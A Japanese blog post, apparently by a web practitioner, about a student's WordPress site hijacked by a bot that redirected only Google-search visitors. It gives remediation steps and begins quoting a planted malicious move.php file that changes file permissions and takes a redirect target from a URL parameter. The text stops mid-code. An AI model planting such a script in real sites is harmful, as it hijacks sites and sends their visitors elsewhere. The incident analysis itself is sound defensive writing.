wordpressブログが中華botに乗っ取られて、Google検索からのアクセスだけを全て奪われた話

可愛い（かどうかは解らない）教え子から久しぶりにDMが届いた。

「三十路さん！忙しいのに申し訳ないのですが、サイトのことで助けて欲しいことがあるのです(;_;)誰にも相談出来なくて…。私のサイトをGoogleで検索して開こうとすると、知らないサイトにリダイレクトされるのです(;_;)htmlファイル追加されてサチコの所有者追加されてたり。取り急ぎサーバーのパスワードは変更したけど…。」

今思えば(;_;)←この顔文字好きやなコイツと思うわけですが、当時は何とかしてあげないとと思い、乗っ取られた前提で指示を出した。

　　・FTPのID, PASS変更

　　・レンサバのID, PASS変更

　　・該当htmlの削除

　　・.htaccessの初期化

　　・サイト管理者の削除

などなど、取り急ぎすぐに出来る対策をDMで伝えるも結果は変わらず、該当のサイトにアクセスすると別サイトに飛ばされてしまう状態だった。

Googleからのアクセスだけを奪う巧妙な手口

サイト運営者の多くは自分のサイトをお気に入りなどに保存してダイレクトにURLへとアクセスする。実際のところ、毎回何かしらのキーワードで検索して自分のサイトにアクセスする人は多くない。

これの意味する所は、アクセス数や広告収入などと定期的に確認していないサイトは乗っ取られたことに気付きにくいということとなる。.htaccessにリダイレクトの記述が無いにも関わらず、Googleだけのアクセスを奪う方法などあるのか？と思いながら、帰宅後に直接FTP情報を教えてもらい調査した。

レンサバ、FTPへのアクセス形跡は無い

レンタルサーバーのコントロールパネル、FTPにログインしたログには可愛い教え子のIPからしかアクセスは無く、気持ち悪さは満点だった。

サーバーに残されたmove.php

move.phpの冒頭には以下のような記述がなされていた。※ファイル名で検索すると英字記事が色々出てきて、対象URLで何かウィルスなどが撒かれない保障は無いのでファイル名などで検索する際は自己責任でお願いします。

<?php

@chmod(".htaccess",0755);

@chmod("index.php",0755);

if(isset($_GET["rdir"]) && trim($_GET["rdir"])){

　$rdir = trim($_GET["rdir"]);